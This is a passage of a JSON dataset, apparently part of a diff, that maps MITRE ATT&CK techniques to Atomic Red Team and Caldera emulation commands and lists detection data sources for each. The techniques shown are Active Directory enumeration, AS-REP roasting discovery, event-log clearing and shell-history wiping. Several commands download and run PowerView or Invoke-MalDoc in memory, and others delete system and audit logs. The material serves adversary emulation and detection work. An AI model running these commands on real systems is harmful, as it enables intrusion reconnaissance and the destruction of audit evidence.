This example has been documented by ransomware actors enumerating Active Directory Groups\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=group)\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Active Directory Groups with Get-AdGroup", + "auto_generated_guid": "3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8", + "description": "The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.\nUpon successful execution a listing of groups will output with their paths in AD.\nReference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "Get-AdGroup -Filter *\n" + } + }, + { + "name": "Enumerate Active Directory Groups with ADSISearcher", + "auto_generated_guid": "9f4e344b-8434-41b3-85b1-d38f29d148d0", + "description": "The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.\nUpon successful execution a listing of groups will output with their paths in 
AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n" + } + }, + { + "name": "Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)", + "auto_generated_guid": "43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8", + "description": "When successful, accounts that do not require kerberos pre-auth will be returned.\nReference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined.\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually.\n" + }, + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n" + } + }, + { + "name": "Get-DomainGroupMember with PowerView", + "auto_generated_guid": "46352f40-f283-4fe5-b56d-d9a71750e145", + "description": "Utilizing PowerView, run Get-DomainGroupMember to identify domain users. 
Upon execution, progress and info about groups within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "name": "powershell" + } + }, + { + "name": "Get-DomainGroup with PowerView", + "auto_generated_guid": "5a8a181c-2c8e-478d-a943-549305a01230", + "description": "Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "name": "powershell" + } + } + ] + }, + { + "id": "2afae782-6d0a-4fbd-a6b6-d1ce90090eac", + "name": "Account-type Admin Enumerator", + "description": "Use PowerView to query the Active Directory server to determine remote admins", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "parsers": { + "plugins.stockpile.app.parsers.netlocalgroup": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": 
"domain.user.name" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "backup.admin.ability", + "edge": "first_failed" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "6d90e6fa-9324-4eb5-93be-9f737245bd7z", + "name": "Discover Domain Admins", + "description": "Use PowerView to query the Active Directory server to determine remote admins", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.002", + "name": "Permission Groups Discovery: Domain Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n", + "parsers": { + "plugins.stockpile.app.parsers.netlocalgroup": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being 
executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.001", + "command_list": [ + "wevtutil cl System\n", + "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "Clear-Eventlog Security;\nClear-Eventlog System;\n" + ], + "commands": [ + { + "command": "wevtutil cl System\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "source": "atomics/T1070.001/T1070.001.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Windows Event Logs" + }, + { + "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n", + "source": 
"data/abilities/defense-evasion/fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml", + "name": "Clear Sysmon logs [intended to trigger CAR-2016-04-002]" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.001", + "display_name": "Indicator Removal on Host: Clear Windows Event Logs", + "atomic_tests": [ + { + "name": "Clear Logs", + "auto_generated_guid": "e6abb60e-26b8-41da-8aae-0c35174b0967", + "description": "Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\\Windows\\System32\\winevt\\Logs and verify that it is now empty.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "log_name": { + "description": "Windows Log Name, ex System", + "type": "String", + "default": "System" + } + }, + "executor": { + "command": "wevtutil cl #{log_name}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Delete System Logs Using Clear-EventLog", + "auto_generated_guid": "b13e9306-3351-4b4b-a6e8-477358b0b498", + "description": "Clear event logs using built-in PowerShell commands.\nUpon successful execution, you should see the list of deleted event logs\nUpon execution, open the Security.evtx logs at C:\\Windows\\System32\\winevt\\Logs and verify that it is now empty or has very few logs in it.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$logs = Get-EventLog -List | ForEach-Object {$_.Log}\n$logs | ForEach-Object {Clear-EventLog -LogName $_ }\nGet-EventLog -list\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Clear Event Logs via VBA", + "auto_generated_guid": "1b682d84-f075-4f93-9a89-8a8de19ffd6e", + "description": "This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. 
\n\nElevation is required for this module to execute properly, otherwise WINWORD will throw an \"Access Denied\" error\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Word.Application\" | Out-Null\n Stop-Process -Name \"winword\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "fcf71ee3-d1a9-4136-b919-9e5f6da43608", + "name": "Clear Logs", + "description": "Clear Sysmon logs [intended to trigger CAR-2016-04-002]", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.001", + "name": "Indicator Removal on Host: Clear Windows Event Logs" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh,pwsh": { + "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, 
+ { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.002", + "command_list": [ + "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf 
/private/var/audit/*\n", + "echo 0> /var/spool/mail/root\n", + "echo 0> /var/log/secure\n" + ], + "commands": [ + { + "command": "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf /private/var/audit/*\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + }, + { + "command": "echo 0> /var/spool/mail/root\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + }, + { + "command": "echo 0> /var/log/secure\n", + "source": "atomics/T1070.002/T1070.002.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Linux or Mac System Logs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.002", + "display_name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "atomic_tests": [ + { + "name": "rm -rf", + "auto_generated_guid": "989cc1b1-3642-4260-a809-54f9dd559683", + "description": "Delete system and audit logs\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "sudo rm -rf /private/var/log/system.log*\nsudo rm -rf /private/var/audit/*\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Overwrite Linux Mail Spool", + "auto_generated_guid": "1602ff76-ed7f-4c94-b550-2f727b4782d4", + "description": "This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of mail spool", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "echo 0> /var/spool/mail/#{username}\n", + "name": "bash" + } + }, + { + "name": "Overwrite Linux Log", + "auto_generated_guid": "d304b2dc-90b4-4465-a650-16ddd503f7b5", + "description": "This test overwrites the specified log. 
This technique was used by threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "log_path": { + "description": "Path of specified log", + "type": "Path", + "default": "/var/log/secure" + } + }, + "executor": { + "command": "echo 0> #{log_path}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands 
executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.003", + "command_list": [ + "rm ~/.bash_history\n", + "echo \"\" > ~/.bash_history\n", + "cat /dev/null > ~/.bash_history\n", + "ln -sf /dev/null ~/.bash_history\n", + "truncate -s0 ~/.bash_history\n", + "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "hostname\nwhoami\n", + "sshpass -p 'pwd101!' 
ssh testuser1@localhost -T hostname\n", + "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "> $HOME/.bash_history && unset HISTFILE\n", + "Clear-History;Clear" + ], + "commands": [ + { + "command": "rm ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "echo \"\" > ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "cat /dev/null > ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "ln -sf /dev/null ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "truncate -s0 ~/.bash_history\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "hostname\nwhoami\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "sshpass -p 'pwd101!' 
ssh testuser1@localhost -T hostname\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "source": "atomics/T1070.003/T1070.003.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Clear Command History" + }, + { + "command": "> $HOME/.bash_history && unset HISTFILE\n", + "source": "data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml", + "name": "Stop terminal from logging history" + }, + { + "command": "Clear-History;Clear", + "source": "data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml", + "name": "Stop terminal from logging history" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.003", + "display_name": "Indicator Removal on Host: Clear Command History", + "atomic_tests": [ + { + "name": "Clear Bash history (rm)", + "auto_generated_guid": "a934276e-2be5-4a36-93fd-98adbb5bd4fc", + "description": "Clears bash history via rm\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "rm ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (echo)", + "auto_generated_guid": "cbf506a5-dd78-43e5-be7e-a46b7c7a0a11", + "description": "Clears bash history via rm\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "echo \"\" > ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (cat dev/null)", + "auto_generated_guid": "b1251c35-dcd3-4ea1-86da-36d27b54f31f", + "description": "Clears bash history via cat /dev/null\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "cat /dev/null > 
~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (ln dev/null)", + "auto_generated_guid": "23d348f3-cc5c-4ba9-bd0a-ae09069f0914", + "description": "Clears bash history via a symlink to /dev/null\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "ln -sf /dev/null ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear Bash history (truncate)", + "auto_generated_guid": "47966a1d-df4f-4078-af65-db6d9aa20739", + "description": "Clears bash history via truncate\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "truncate -s0 ~/.bash_history\n", + "name": "sh" + } + }, + { + "name": "Clear history of a bunch of shells", + "auto_generated_guid": "7e6721df-5f08-4370-9255-f06d8a77af4c", + "description": "Clears the history of a bunch of different shell types by setting the history size to zero\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "unset HISTFILE\nexport HISTFILESIZE=0\nhistory -c\n", + "name": "sh" + } + }, + { + "name": "Clear and Disable Bash History Logging", + "auto_generated_guid": "784e4011-bd1a-4ecd-a63a-8feb278512e6", + "description": "Clears the history and disable bash history logging of the current shell and future shell sessions\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "set +o history\necho 'set +o history' >> ~/.bashrc\n. ~/.bashrc\nhistory -c\n", + "cleanup_command": "sed -i 's/set +o history//g' ~/.bashrc\n. 
~/.bashrc\nset -o history\n", + "name": "sh" + } + }, + { + "name": "Use Space Before Command to Avoid Logging to History", + "auto_generated_guid": "53b03a54-4529-4992-852d-a00b4b7215a6", + "description": "Using a space before a command causes the command to not be logged in the Bash History file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "hostname\nwhoami\n", + "name": "sh" + } + }, + { + "name": "Disable Bash History Logging with SSH -T", + "auto_generated_guid": "5f8abd62-f615-43c5-b6be-f780f25790a1", + "description": "Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog\n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "Install sshpass and create user account used for excuting\n", + "prereq_command": "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n", + "get_prereq_command": "/usr/sbin/useradd testuser1\necho -e 'pwd101!\\npwd101!' | passwd testuser1\n(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)\n" + } + ], + "executor": { + "command": "sshpass -p 'pwd101!' 
ssh testuser1@localhost -T hostname\n", + "cleanup_command": "userdel -f testuser1\n", + "name": "sh" + } + }, + { + "name": "Prevent Powershell History Logging", + "auto_generated_guid": "2f898b81-3e97-4abb-bc3f-a95138988370", + "description": "Prevents Powershell history\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing\n", + "name": "powershell", + "cleanup_command": "Set-PSReadLineOption -HistorySaveStyle SaveIncrementally" + } + }, + { + "name": "Clear Powershell History by Deleting History File", + "auto_generated_guid": "da75ae8d-26d6-4483-b0fe-700e4df4f037", + "description": "Clears Powershell history\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item (Get-PSReadlineOption).HistorySavePath\n", + "name": "powershell" + } + } + ] + }, + { + "id": "43b3754c-def4-4699-a673-1d85648fda6a", + "name": "Avoid logs", + "description": "Stop terminal from logging history", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.003", + "name": "Indicator Removal on Host: Clear Command History" + }, + "platforms": { + "darwin": { + "sh": { + "command": "> $HOME/.bash_history && unset HISTFILE\n" + } + }, + "linux": { + "sh": { + "command": "> $HOME/.bash_history && unset HISTFILE\n" + } + }, + "windows": { + "psh": { + "command": "Clear-History;Clear" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + 
"target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
